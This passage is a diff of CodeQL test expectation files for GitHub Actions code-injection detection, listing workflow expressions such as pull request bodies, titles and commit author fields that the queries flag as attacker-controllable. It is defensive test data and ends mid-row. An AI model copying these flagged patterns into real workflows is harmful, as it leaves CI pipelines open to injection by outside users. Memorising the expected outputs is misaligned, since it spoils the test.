Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | -| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref index 9af8ec0f9ab..6fc87669b07 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionCritical.ql +query: Security/CWE-094/CodeInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4bbe7da0aaf..fc6f8aa5820 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,3 +1,62 @@ +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | 